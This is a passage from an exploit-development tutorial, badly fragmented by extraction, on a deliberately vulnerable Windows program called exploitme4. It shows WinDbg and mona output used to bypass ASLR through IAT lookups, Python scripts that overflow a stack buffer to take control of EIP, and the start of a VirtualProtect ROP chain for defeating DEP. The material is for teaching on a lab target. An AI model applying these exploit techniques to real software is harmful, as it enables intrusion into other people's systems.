_getch
()
 
!=
 
'y'
)
 
            
break
;
 
        
printf
(
"
\
n"
);
 
    
}
 
    
return
 
0
;
 
}
 
 
This program is similar to the previous ones, but 
some logic has been moved to a 
class
. Also, the program 
has a loop so that we can exploit the program multiple times without leaving the program.
 
The vulnerability is still the same: we can overflow the buffer 
name
 (inside the class 
Name
), but this time we
 
can exploit it in two different ways:
 
1
.
 
The object 
name
 is on the stack so, by overflowing its property 
name
, we can control
 ret eip
 of 
main()
 
so that when 
main()
 returns our shellcode is called.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 148 
-
 
2
.
 
By overflowing the property 
name
 of the object 
name
, we can o
verwrite the property 
ptr
 which is used 
in the function 
printNameInHex()
. By controlling 
ptr
 we can make 
printNameInHex()
 output 32 bytes of 
arbitrary memory.
 
First of all, let’s see if we need to use an info leak to bypass ASLR. Load 
exploitme4.exe
 in 
Win
Dbg 
(
article
), 
put a breakpoint on 
main()
 with
 
bp exploitme4!main
 
and hit 
F5
 (go). Then let’s list the modules with 
mona 
(
article
):
 
0:000> !py mona modules
 
Hold on...
 
[+] Command use
d:
 
!py mona.py modules
 
 
----------
 Mona command started on 2015
-
03
-
22 02:22:46 (v2.0, rev 554) 
----------
 
[+] Processing arguments and criteria
 
    
-
 Pointer access level : X
 
[+] Generating module info table, hang on...
 
    
-
 Processing modules
 
    
-
 Done.
 Let's rock 'n roll.
 
----------------------------------------------------------------------------------------------------------------------------------
 
 Module info :
 
-----------------------------------------------------------------------------------------
-----------------------------------------
 
 Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
 
----------------------------------------------------------------------------------------------------
------------------------------
 
 0x77090000 | 0x7709a000 | 0x0000a000 | False  | True    | True  |  True    | True   | 6.1.7601.18768 [LPK.dll] (C:
\
Windows
\
s
yswow64
\
LPK.dll)
 
 0x747c0000 | 0x7481a000 | 0x0005a000 | False  | True    | True  |  True    | True 
  | 8.0.0.4344 [guard32.dll] (C:
\
Windows
\
S
ysWOW64
\
guard32.dll)
 
 0x76890000 | 0x7695c000 | 0x000cc000 | False  | True    | True  |  True    | True   | 6.1.7601.18731 [MSCTF.dll] (C:
\
Window
s
\
syswow64
\
MSCTF.dll)
 
 0x74e90000 | 0x74ed7000 | 0x00047000 | False  
| True    | True  |  True    | True   | 6.1.7601.18409 [KERNELBASE.dll] (C:
\
Windows
\
syswow64
\
KERNELBASE.dll)
 
 0x747b0000 | 0x747b9000 | 0x00009000 | False  | True    | True  |  True    | True   | 6.1.7600.16385 [VERSION.dll] (C:
\
Wind
ows
\
SysWOW64
\
VERSION.dl
l)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 149 
-
 
 0x747a0000 | 0x747a7000 | 0x00007000 | False  | True    | True  |  True    | True   | 6.1.7600.16385 [fltlib.dll] (C:
\
Windows
\
S
ysWOW64
\
fltlib.dll)
 
 0x76ad0000 | 0x76b6d000 | 0x0009d000 | False  | True    | True  |  True    | True   | 1.626.7601.18454 [
USP10.dll] (C:
\
Wind
ows
\
syswow64
\
USP10.dll)
 
 0x01390000 | 0x01396000 | 0x00006000 | False  | True    | True  |  True    | False  | 
-
1.0
-
 [exploitme4.exe] (exploitme4.exe)
 
 0x74f90000 | 0x75020000 | 0x00090000 | False  | True    | True  |  True    | True   |
 6.1.7601.18577 [GDI32.dll] (C:
\
Windows
\
syswow64
\
GDI32.dll)
 
 0x76320000 | 0x76430000 | 0x00110000 | False  | True    | True  |  True    | True   | 6.1.7601.18409 [kernel32.dll] (C:
\
Windo
ws
\
syswow64
\
kernel32.dll)
 
 0x755e0000 | 0x7568c000 | 0x000ac000 | Fals
e  | True    | True  |  True    | True   | 7.0.7601.17744 [msvcrt.dll] (C:
\
Window
s
\
syswow64
\
msvcrt.dll)
 
 0x74a40000 | 0x74a4c000 | 0x0000c000 | False  | True    | True  |  True    | True   | 6.1.7600.16385 [CRYPTBASE.dll] (C:
\
Windows
\
syswow64
\
CRYPTBASE.dll
)
 
 0x74a50000 | 0x74ab0000 | 0x00060000 | False  | True    | True  |  True    | True   | 6.1.7601.18779 [SspiCli.dll] (C:
\
Window
s
\
syswow64
\
SspiCli.dll)
 
 0x770c0000 | 0x77240000 | 0x00180000 | False  | True    | True  |  True    | True   | 6.1.7601.18247 [n
tdll.dll] (ntdll.dll)
 
 0x76bc0000 | 0x76c60000 | 0x000a0000 | False  | True    | True  |  True    | True   | 6.1.7601.18247 [ADVAPI32.dll] (C:
\
Win
dows
\
syswow64
\
ADVAPI32.dll)
 
 0x764c0000 | 0x765b0000 | 0x000f0000 | False  | True    | True  |  True    | True
   | 6.1.7601.18532 [RPCRT4.dll] (C:
\
Windo
ws
\
syswow64
\
RPCRT4.dll)
 
 0x6c9f0000 | 0x6cade000 | 0x000ee000 | False  | True    | True  |  True    | True   | 12.0.21005.1 [MSVCR120.dll] (C:
\
Windo
ws
\
SysWOW64
\
MSVCR120.dll)
 
 0x755a0000 | 0x755b9000 | 0x00019000 | 
False  | True    | True  |  True    | True   | 6.1.7600.16385 [sechost.dll] (C:
\
Windo
ws
\
SysWOW64
\
sechost.dll)
 
 0x76980000 | 0x76985000 | 0x00005000 | False  | True    | True  |  True    | True   | 6.1.7600.16385 [PSAPI.DLL] (C:
\
Windo
ws
\
syswow64
\
PSAPI.DLL)
 
 0x76790000 | 0x76890000 | 0x00100000 | False  | True    | True  |  True    | True   | 6.1.7601.17514 [USER32.dll] (C:
\
Windo
ws
\
syswow64
\
USER32.dll)
 
 0x74d00000 | 0x74d60000 | 0x00060000 | False  | True    | True  |  True    | True   | 6.1.7601.17514 [IMM32
.DLL] (C:
\
Windo
ws
\
SysWOW64
\
IMM32.DLL)
 
----------------------------------------------------------------------------------------------------------------------------------
 
 
[+] This mona.py action took 0:00:00.110000
 
As we can see, all the modules support AS
LR, so we’ll need to rely on the info leak we discovered in 
exploitme4.exe
.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 150 
-
 
Through the info leak we’ll discover the base addresses of 
kernel32.dll
, 
ntdll.dll
 and 
msvcr120.dll
. To do this, 
we first need to collect some information about the layout of 
explo
itme4.exe
 and the three libraries we’re 
interested in.
 
.next section
 
First of all, let’s determine the 
RVA
 (i.e. offset relative to the base address) of the 
.text
 (i.e. code) section of 
exploitme4.exe
:
 
0:000> !dh 
-
s exploitme4
 
 
SECTION HEADER #1
 
   .text n
ame
 
     AAC virtual size
 
    1000 virtual address          <
---------------------------
 
     C00 size of raw data
 
     400 file pointer to raw data
 
       0 file pointer to relocation table
 
       0 file pointer to line numbers
 
       0 number of relocati
ons
 
       0 number of line numbers
 
60000020 flags
 
         Code
 
         (no align specified)
 
         Execute Read
 
 
SECTION HEADER #2
 
  .rdata name
 
     79C virtual size
 
    2000 virtual address
 
     800 size of raw data
 
    1000 file pointer to raw data
 
       0 file pointer to relocation table
 
       0 file pointer to line numbers
 
       0 number of relocations
 
       0 number of line numbers
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 151 
-
 
40000040 flags
 
         Initialized Data
 
         (no align specified)
 
         Read Only
 
<snip>
 
As we can see, 
the RVA is 
1000h
. This information will come in handy soon.
 
Virtual Functions
 
The class 
Name 
has two 
virtual functions
:
 printName()
 and 
printNameInHex()
. This means that 
Name
 has a 
virtual function table
 used to call the two virtual functions. Let’s see ho
w this works.
 
In 
OOP
 (
O
bject
-
O
riented 
P
rogramming), classes can be specialized, i.e. a class can derive from another 
class. Consider the following example:
 
C++
 
 
#define _USE_MATH_DEFINES
 
#include <cmath>
 
#include <cstdio>
 
 
class
 
Figure
 
{
 
public
:
 
    
virtu
al
 
double
 
getArea
()
 
=
 
0
;
 
};
 
 
class
 
Rectangle
 
:
 
public
 
Figure
 
{
 
    
double
 
base
,
 
height
;
 
 
public
:
 
    
Rectangle
(
double
 
base
,
 
double
 
height
)
 
:
 
base
(
base
),
 
height
(
height
)
 
{}
 
 
virtual
 
double
 
getArea
()
 
{
 
        
return
 
base
 
*
 
height
;
 
    
}
 
};
 
 
class
 
Cir
cle
 
:
 
public
 
Figure
 
{
 
    
double
 
radius
;
 
 
public
:
 
    
Circle
(
double
 
radius
)
 
:
 
radius
(
radius
)
 
{}
 
 
virtual
 
double
 
getArea
()
 
{
 
        
return
 
radius
 
*
 
M_PI
;
 
    
}
 
};
 
 
int
 
main
()
 
{
 
    
Figure
 
*
figures
[]
 
=
 
{
 
new
 
Rectangle
(
10
,
 
5
),
 
new
 
Circle
(
1.5
),
 
new
 
Rec
tangle
(
5
,
 
10
)
 
};
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 152 
-
 
 
for
 
(
Figure
 
*
f
 
:
 
figures
)
 
        
printf
(
"area: %lf
\
n"
,
 
f
-
>
getArea
());
 
 
return
 
0
;
 
}
 
 
The classes 
Rectangle
 and 
Circle
 inherit from the class 
Figure
, i.e. a 
Rectangle
 
is a
 
Figure
 and a 
Circle
 
is a
 
Figure
. This means that we can p
ass a pointer to a 
Rectangle
 or a 
Circle
 where a pointer to a 
Figure
 is 
expected. Note that 
Figure
 has no implementation for the method 
getArea()
, but 
Rectangle
 and 
Circle
 
provide their own specialized implementations for that function.
 
Have a look at the 
main()
 function. First three 
Figures
 (two 
Rectangles
 and a 
Circle
) are allocated and their 
pointers are put into the array 
figures
. Then, for each pointer 
f
 of type 
Figure *
, 
f
-
>getArea()
 is called. This 
last expression calls the right implementation of 
ge
tArea()
 depending on whether the figure is a 
Rectangle
 or 
a 
Circle
.
 
How is this implemented in assembly? Let’s look at the 
for loop
:
 
    for (Figure *f : figures)
 
010910AD 8D 74 24 30          lea         esi,[esp+30h]  
 
010910B1 89 44 24 38          mov  
       dword ptr [esp+38h],eax  
 
010910B5 BF 03 00 00 00       mov         edi,3  
 
010910BA 8D 9B 00 00 00 00    lea         ebx,[ebx]  
 
010910C0 8B 0E                mov         ecx,dword ptr [esi]  
 
        
printf("area: %lf
\
n", f
-
>getArea());
 
010910C2 8
B 01                mov         eax,dword ptr [ecx]  
 
010910C4 8B 00                mov         eax,dword ptr [eax]  
 
010910C6 FF D0                call        eax  
 
010910C8 83 EC 08             sub         esp,8  
 
010910CB DD 1C 24             fstp      
  qword ptr [esp]  
 
010910CE 68 18 21 09 01       push        1092118h  
 
010910D3 FF D3                call        ebx  
 
010910D5 83 C4 0C             add         esp,0Ch  
 
010910D8 8D 76 04             lea         esi,[esi+4]  
 
010910DB 4F                
   dec         edi  
 
010910DC 75 E2                jne         main+0A0h (010910C0h)  
 
    
return 0;
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 153 
-
 
}
 
The interesting lines are the following:
 
010910C0 8B 0E                mov         ecx,dword ptr [esi]     // ecx = ptr to the object
 
        printf("are
a: %lf
\
n", f
-
>getArea());
 
010910C2 8B 01                mov         eax,dword ptr [ecx]     // eax = ptr to the VFTable
 
010910C4 8B 00                mov         eax,dword ptr [eax]     // eax = ptr to the getArea() implementation
 
010910C6 FF D0           
     call        eax
 
Each object starts with a pointer to the associated 
VFTable
. All the objects of type 
Rectangle
 point to the 
same VFTable which contains a pointer to the implementation of 
getArea()
 associated with 
Rectangle
. The 
objects of type 
Circle
 
point to another VFTable which contains a pointer to their own implementation of
 
getArea()
. With this additional level of indirection, the same assembly code calls the right implementation of 
getArea()
 for each object depending on its type, i.e. on its VFT
able.
 
A little picture might help to clarify this further:
 
 
Let’s get back to 
exploitme4.exe
. Load it in WinDbg, put a breakpoint o
n 
main()
 and hit 
F10
 (step) until 
you’re inside the 
while loop
 (look at the source code). This makes sure that the object 
name
 has been 
created and initialized.
 
The layout of the object 
name
 is the following:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 154 
-
 
|VFTptr | name           | ptr   |
 
 <DWORD> <
--
 32 bytes 
--
> <DWORD>
 
As we said before, the Virtual Function Table pointer is at offset 
0
. Let’s read that pointer:
 
0:000> dd name
 
0033f8b8  
011421a0
 0033f8e8 01141290 0114305c
 
0033f8c8  01143060 01143064 00000000 0114306c
 
0033f8d8  6ca0cc79 0033f8bc 0000
0001 0033f924
 
0033f8e8  011413a2 00000001 00574fb8 00566f20
 
0033f8f8  155a341e 00000000 00000000 7efde000
 
0033f908  00000000 0033f8f8 00000022 0033f960
 
0033f918  011418f9 147dee12 00000000 0033f930
 
0033f928  7633338a 7efde000 0033f970 770f9f72
 
The 
VFTptr
 i
s 
0x011421a0
. Now, let’s view the contents of the VFTable:
 
0:000> dd 011421a0
 
011421a0  01141000 01141020 00000048 00000000
 
011421b0  00000000 00000000 00000000 00000000
 
011421c0  00000000 00000000 00000000 00000000
 
011421d0  00000000 00000000 00000000 000
00000
 
011421e0  00000000 01143018 01142310 00000001
 
011421f0  53445352 9c20999b 431fa37a cc3e54bc
 
01142200  da01c06e 00000010 755c3a63 73726573
 
01142210  75696b5c 5c6d6e68 75636f64 746e656d
 
We have one pointer for 
printName()
 (
0x01141000
) and another for 
p
rintNameInHex()
 (
0x01141020
). Let’s 
compute the RVA of the pointer to 
printName()
:
 
0:000> ? 01141000
-
exploitme4
 
Evaluate expression: 4096 = 00001000
 
IAT
 
The 
IAT
 (
I
mport 
A
ddress 
T
able) of a file 
PE
 is a table which the 
OS loader
 fills in with the addresses 
of the 
functions imported from other modules during the 
dynamic linking
 phase. When a program wants to call an 
imported function, it uses a 
CALL
 with the following form:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 155 
-
 
CALL      dword ptr ds:[location_in_IAT]
 
By inspecting the IAT of
 exploitme4.exe
 we ca
n learn the base addresses of the modules the functions are 
imported from.
 
First let’s find out where the IAT is located:
 
0:000> !dh 
-
f exploitme4
 
 
File Type: EXECUTABLE IMAGE
 
FILE HEADER VALUES
 
     14C machine (i386)
 
       5 number of sections
 
550DA390 
time date stamp Sat Mar 21 18:00:00 2015
 
 
       0 file pointer to symbol table
 
       0 number of symbols
 
      E0 size of optional header
 
     102 characteristics
 
            Executable
 
            32 bit word machine
 
 
OPTIONAL HEADER VALUES
 
     10B mag
ic #
 
   12.00 linker version
 
     C00 size of code
 
    1000 size of initialized data
 
       0 size of uninitialized data
 
    140A address of entry point
 
    1000 base of code
 
         
-----
 new 
-----
 
00ac0000 image base
 
    1000 section alignment
 
     200 
file alignment
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 156 
-
 
       3 subsystem (Windows CUI)
 
    6.00 operating system version
 
    0.00 image version
 
    6.00 subsystem version
 
    6000 size of image
 
     400 size of headers
 
       0 checksum
 
00100000 size of stack reserve
 
00001000 size of stack comm
it
 
00100000 size of heap reserve
 
00001000 size of heap commit
 
    8140  DLL characteristics
 
            Dynamic base
 
            NX compatible
 
            Terminal server aware
 
       0 [       0] address  of Export Directory
 
    23C4 [      3C] address  o
f Import Directory
 
    4000 [     1E0] address  of Resource Directory
 
       0 [       0] address  of Exception Directory
 
       0 [       0] address  of Security Directory
 
    5000 [     1B4] address  of Base Relocation Directory
 
    20E0 [      38] addre
ss  of Debug Directory
 
       0 [       0] address  of Description Directory
 
       0 [       0] address  of Special Directory
 
       0 [       0] address  of Thread Storage Directory
 
    21A8 [      40] address  of Load Configuration Directory
 
       0 [ 
      0] address  of Bound Import Directory
 
    2000 [      B8] address  of Import Address Table Directory   <
-----------------------
 
       0 [       0] address  of Delay Import Directory
 
       0 [       0] address  of COR20 Header Directory
 
       0 [  
     0] address  of Reserved Directory
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 157 
-
 
The RVA of the IAT is 
0x2000
 and its size is 
0xB8
 bytes. Now we can display the contents of the IAT by 
using the command 
dps
 which displays the addresses with the associated symbols:
 
0:000> dps exploitme4+2000 LB8/4
 
0
0ac2000  76334a25 kernel32!IsDebuggerPresentStub     <
----------------------
 kernel32
 
00ac2004  770f9dd5 ntdll!RtlDecodePointer             <
----------------------
 ntdll
 
00ac2008  763334c9 kernel32!GetSystemTimeAsFileTimeStub                               
   msvcr120
 
00ac200c  76331420 kernel32!GetCurrentThreadIdStub                                           |
 
00ac2010  763311f8 kernel32!GetCurrentProcessIdStub                                          |
 
00ac2014  763316f1 kernel32!QueryPerformanceCounterStu
b                                      |
 
00ac2018  7710107b ntdll!RtlEncodePointer                                                    |
 
00ac201c  763351fd kernel32!IsProcessorFeaturePresent                                        |
 
00ac2020  00000000       
                                                                    |
 
00ac2024  6ca94ced MSVCR120!_XcptFilter [f:
\
dd
\
vctools
\
crt
\
crtw32
\
misc
\
winxfltr.c @ 195] <
---
+
 
00ac2028  6ca6bb8d MSVCR120!_amsg_exit [f:
\
dd
\
vctools
\
crt
\
crtw32
\
startup
\
crt0dat.c @ 485]
 
0
0ac202c  6ca1e25f MSVCR120!__getmainargs [f:
\
dd
\
vctools
\
crt
\
crtw32
\
dllstuff
\
crtlib.c @ 142]
 
00ac2030  6ca1c7ce MSVCR120!__set_app_type [f:
\
dd
\
vctools
\
crt
\
crtw32
\
misc
\
errmode.c @ 94]
 
00ac2034  6ca24293 MSVCR120!exit [f:
\
dd
\
vctools
\
crt
\
crtw32
\
startup
\
crt0dat
.c @ 416]
 
00ac2038  6ca6bbb8 MSVCR120!_exit [f:
\
dd
\
vctools
\
crt
\
crtw32
\
startup
\
crt0dat.c @ 432]
 
00ac203c  6ca24104 MSVCR120!_cexit [f:
\
dd
\
vctools
\
crt
\
crtw32
\
startup
\
crt0dat.c @ 447]
 
00ac2040  6ca955eb MSVCR120!_configthreadlocale [f:
\
dd
\
vctools
\
crt
\
crtw32
\
m
isc
\
wsetloca.c @ 141]
 
00ac2044  6ca6b9e9 MSVCR120!__setusermatherr [f:
\
dd
\
vctools
\
crt
\
fpw32
\
tran
\
matherr.c @ 41]
 
00ac2048  6ca0cc86 MSVCR120!_initterm_e [f:
\
dd
\
vctools
\
crt
\
crtw32
\
startup
\
crt0dat.c @ 990]
 
00ac204c  6ca0cc50 MSVCR120!_initterm [f:
\
dd
\
vctools
\
crt
\
crtw32
\
startup
\
crt0dat.c @ 941]
 
00ac2050  6cacf62c MSVCR120!__initenv
 
00ac2054  6cacf740 MSVCR120!_fmode
 
00ac2058  6c9fec80 MSVCR120!type_info::~type_info [f:
\
dd
\
vctools
\
crt
\
crtw32
\
eh
\
typinfo.cpp @ 32]
 
00ac205c  6ca8dc2c MSVCR120!terminate [f:
\
dd
\
vcto
ols
\
crt
\
crtw32
\
eh
\
hooks.cpp @ 66]
 
00ac2060  6ca1c7db MSVCR120!__crtSetUnhandledExceptionFilter [f:
\
dd
\
vctools
\
crt
\
crtw32
\
misc
\
winapisupp.c @ 194]
 
00ac2064  6c9fedd7 MSVCR120!_lock [f:
\
dd
\
vctools
\
crt
\
crtw32
\
startup
\
mlock.c @ 325]
 
00ac2068  6c9fedfc MSVCR120
!_unlock [f:
\
dd
\
vctools
\
crt
\
crtw32
\
startup
\
mlock.c @ 363]
 
00ac206c  6ca01208 MSVCR120!_calloc_crt [f:
\
dd
\
vctools
\
crt
\
crtw32
\
heap
\
crtheap.c @ 55]
 
00ac2070  6ca0ca46 MSVCR120!__dllonexit [f:
\
dd
\
vctools
\
crt
\
crtw32
\
misc
\
onexit.c @ 263]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 158 
-
 
00ac2074  6ca1be6b MSVCR
120!_onexit [f:
\
dd
\
vctools
\
crt
\
crtw32
\
misc
\
onexit.c @ 81]
 
00ac2078  6ca9469b MSVCR120!_invoke_watson [f:
\
dd
\
vctools
\
crt
\
crtw32
\
misc
\
invarg.c @ 121]
 
00ac207c  6ca1c9b5 MSVCR120!_controlfp_s [f:
\
dd
\
vctools
\
crt
\
fpw32
\
tran
\
contrlfp.c @ 36]
 
00ac2080  6ca02aaa M
SVCR120!_except_handler4_common [f:
\
dd
\
vctools
\
crt
\
crtw32
\
misc
\
i386
\
chandler4.c @ 260]
 
00ac2084  6ca96bb8 MSVCR120!_crt_debugger_hook [f:
\
dd
\
vctools
\
crt
\
crtw32
\
misc
\
dbghook.c @ 57]
 
00ac2088  6ca9480c MSVCR120!__crtUnhandledException [f:
\
dd
\
vctools
\
crt
\
crtw
32
\
misc
\
winapisupp.c @ 253]
 
00ac208c  6ca947f7 MSVCR120!__crtTerminateProcess [f:
\
dd
\
vctools
\
crt
\
crtw32
\
misc
\
winapisupp.c @ 221]
 
00ac2090  6c9fed74 MSVCR120!operator delete [f:
\
dd
\
vctools
\
crt
\
crtw32
\
heap
\
delete.cpp @ 20]
 
00ac2094  6ca9215c MSVCR120!_getch 
[f:
\
dd
\
vctools
\
crt
\
crtw32
\
lowio
\
getch.c @ 237]
 
00ac2098  6ca04f9e MSVCR120!fclose [f:
\
dd
\
vctools
\
crt
\
crtw32
\
stdio
\
fclose.c @ 43]
 
00ac209c  6ca1fdbc MSVCR120!fseek [f:
\
dd
\
vctools
\
crt
\
crtw32
\
stdio
\
fseek.c @ 96]
 
00ac20a0  6ca1f9de MSVCR120!ftell [f:
\
dd
\
vctool
s
\
crt
\
crtw32
\
stdio
\
ftell.c @ 45]
 
00ac20a4  6ca05a8c MSVCR120!fread [f:
\
dd
\
vctools
\
crt
\
crtw32
\
stdio
\
fread.c @ 301]
 
00ac20a8  6ca71dc4 MSVCR120!fopen [f:
\
dd
\
vctools
\
crt
\
crtw32
\
stdio
\
fopen.c @ 124]
 
00ac20ac  6cacf638 MSVCR120!_commode
 
00ac20b0  6ca72fd9 MSVCR
120!printf [f:
\
dd
\
vctools
\
crt
\
crtw32
\
stdio
\
printf.c @ 49]
 
00ac20b4  00000000
 
We just need three addresses, one for each module. Now let’s compute the RVAs of the three addresses:
 
0:000> ? kernel32!IsDebuggerPresentStub
-
kernel32
 
Evaluate expression: 84517 =
 00014a25
 
0:000> ? ntdll!RtlDecodePointer
-
ntdll
 
Evaluate expression: 237013 = 00039dd5
 
0:000> ? MSVCR120!_XcptFilter
-
msvcr120
 
Evaluate expression: 675053 = 000a4ced
 
So we know the following:
 
@exploitme4 + 00002000    kernel32 + 00014a25
 
@exploitme4 + 00002
004    ntdll + 00039dd5
 
@exploitme4 + 00002024    msvcr120 + 000a4ced
 
The first line means that at address 
exploitme4 + 00002000
 there is 
kernel32 + 00014a25
. Even if 
exploitme4
 and 
kernel32
 (which are the base addresses) change, the RVAs remain constant, 
therefore the 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 159 
-
 
table is always correct. This information will be crucial to determine the base addresses of 
kernel32.dll
, 
ntdll.dll
 and 
msvcr120.dll
 during the exploitation.
 
Popping up the calculator
 
As we’ve already seen, the layout of the object 
name
 is t
he following:
 
|VFTptr | name           | ptr   |
 
 <DWORD> <
--
 32 bytes 
--
> <DWORD>
 
This means that 
ptr
 is overwritten with the dword at offset 
32
 in the file 
name.dat
. For now we’ll ignore 
ptr
 
because we want to take control of 
EIP
.
 
First of all, notice th
at the object 
name
 is allocated on the stack, so it is indeed possible to overwrite 
ret eip
 
by overflowing the property 
name
.
 
Since we must overwrite 
ptr
 on the way to take control of 
EIP
, we must choose the address of a readable 
location for 
ptr 
or 
exploi
tme4
 will crash when it tries to use 
ptr
. We can overwrite 
ptr
 with the base address of 
kernel32.dll
.
 
Fire up 
IDLE
 and run the following 
Python
 script:
 
Python
 
 
with
 
open
(
r'c:
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
readable
 
=
 
struct
.
pack
(
'<I'
,
 
0x76320000
)
 
    
name
 
=
 
'a
'
*
32
 
+
 
readable
 
+
 
'b'
*
100
 
    
f
.
write
(
name
)
 
 
Load 
exploitme4
 in WinDbg, hit 
F5
 (go) and in 
exploitme4
‘s console enter ‘
n
‘ to exit from 
main()
 and trigger 
the exception:
 
(ff4.2234): Access violation 
-
 code c0000005 (first chance)
 
First chance exceptions are
 reported before any exception handling.
 
This exception may be expected and handled.
 
eax=00000000 ebx=00000000 ecx=6ca92195 edx=0020e0e8 esi=00000001 edi=00000000
 
eip=62626262 esp=001cf768 ebp=62626262 iopl=0         nv up ei pl zr na pe nc
 
cs=0023  ss=002
b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 
62626262 ??              ???
 
We can see that 
EIP
 was overwritten by 4 of our “
b
“s. Let’s compute the exact offset of the dword that 
controls 
EIP
 by using a special pattern:
 
0:000> !py mona patt
ern_create 100
 
Hold on...
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 160 
-
 
[+] Command used:
 
!py mona.py pattern_create 100
 
Creating cyclic pattern of 100 bytes
 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0
Ad1Ad2A
 
[+] Preparing output file 'pattern.txt'
 
   
-
 (Re)setting logfile d:
\
WinDbg_logs
\
exploitme4
\
pattern.txt
 
Note: don't copy this pattern from the log window, it might be truncated !
 
It's better to open d:
\
WinDbg_logs
\
exploitme4
\
pattern.txt and copy the pattern from the file
 
 
[+] This mona.py action to
ok 0:00:00.030000
 
Here’s the updated script:
 
Python
 
 
with
 
open
(
r'c:
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
readable
 
=
 
struct
.
pack
(
'<I'
,
 
0x76320000
)
 
    
pattern
 
=
 
(
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6'
+
 
           
'Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac
9Ad0Ad1Ad2A'
)
 
    
name
 
=
 
'a'
*
32
 
+
 
readable
 
+
 
pattern
 
    
f
.
write
(
name
)
 
 
Repeat the process in WinDbg to generate another exception:
 
(f3c.23b4): Access violation 
-
 code c0000005 (first chance)
 
First chance exceptions are reported before any exception handli
ng.
 
This exception may be expected and handled.
 
eax=00000000 ebx=00000000 ecx=6ca92195 edx=001edf38 esi=00000001 edi=00000000
 
eip=33614132 esp=0039f9ec ebp=61413161 iopl=0         nv up ei pl zr na pe nc
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
             efl=00010246
 
33614132 ??              ???
 
Let’s find out the offset of 
0x33614132
:
 
0:000> !py mona pattern_offset 33614132
 
Hold on...
 
[+] Command used:
 
!py mona.py pattern_offset 33614132
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 161 
-
 
Looking for 2Aa3 in pattern of 500000 bytes
 
 
-
 Pattern 
2Aa3 (0x33614132) found in cyclic pattern at position 8
 
Looking for 2Aa3 in pattern of 500000 bytes
 
Looking for 3aA2 in pattern of 500000 bytes
 
 
-
 Pattern 3aA2 not found in cyclic pattern (uppercase)  
 
Looking for 2Aa3 in pattern of 500000 bytes
 
Looking fo
r 3aA2 in pattern of 500000 bytes
 
 
-
 Pattern 3aA2 not found in cyclic pattern (lowercase)  
 
 
[+] This mona.py action took 0:00:00.180000
 
Now that we know that the offset is 
8
, we can reuse the script we used before to defeat DEP. We just need 
to make some 
minor modification and to remember to update the base addresses for 
kernel32.dll
, 
ntdll.dll
 
and 
msvcr120.dll
.
 
Here’s the full script:
 
Python
 
 
import
 
struct
 
 
# The signature of VirtualProtect is the following:
 
#   BOOL WINAPI VirtualProtect(
 
#     _In_   L
PVOID lpAddress,
 
#     _In_   SIZE_T dwSize,
 
#     _In_   DWORD flNewProtect,
 
#     _Out_  PDWORD lpflOldProtect
 
#   );
 
 
# After PUSHAD is executed, the stack looks like this:
 
#   .
 
#   .
 
#   .
 
#   EDI (ptr to ROP NOP (RETN))
 
#   ESI (ptr to JMP [EAX] (EA
X = address of ptr to VirtualProtect))
 
#   EBP (ptr to POP (skips EAX on the stack))
 
#   ESP (lpAddress (automatic))
 
#   EBX (dwSize)
 
#   EDX (NewProtect (0x40 = PAGE_EXECUTE_READWRITE))
 
#   ECX (lpOldProtect (ptr to writeable address))
 
#   EAX (address of
 ptr to VirtualProtect)
 
# lpAddress:
 
#   ptr to "call esp"
 
#   <shellcode>
 
 
msvcr120
 
=
 
0x6c9f0000
 
kernel32
 
=
 
0x76320000
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 162 
-
 
ntdll
 
=
 
0x770c0000
 
 
def
 
create_rop_chain
():
 
    
for_edx
 
=
 
0xffffffff
 
 
# rop chain generated with mona.py 
-
 www.corelan.be (and mo
dified by me).
 
    
rop_gadgets
 
=
 
[
 
        
msvcr120
 
+
 
0xbf868
,
  
# POP EBP # RETN [MSVCR120.dll]
 
        
msvcr120
 
+
 
0xbf868
,
  
# skip 4 bytes [MSVCR120.dll]
 
 
# ebx = 0x400 (dwSize)
 
        
msvcr120
 
+
 
0x1c658
,
  
# POP EBX # RETN [MSVCR120.dll]
 
       
0x11110511
,
 
        
msvcr120
 
+
 
0xdb6c4
,
  
# POP ECX # RETN [MSVCR120.dll]
 
        
0xeeeefeef
,
 
        
msvcr120
 
+
 
0x46398
,
  
# ADD EBX,ECX # SUB AL,24 # POP EDX # RETN [MSVCR120.dll]
 
        
for_edx
,
 
 
# edx = 0x40 (NewProtect = PAGE_EXECUTE_READWRIT
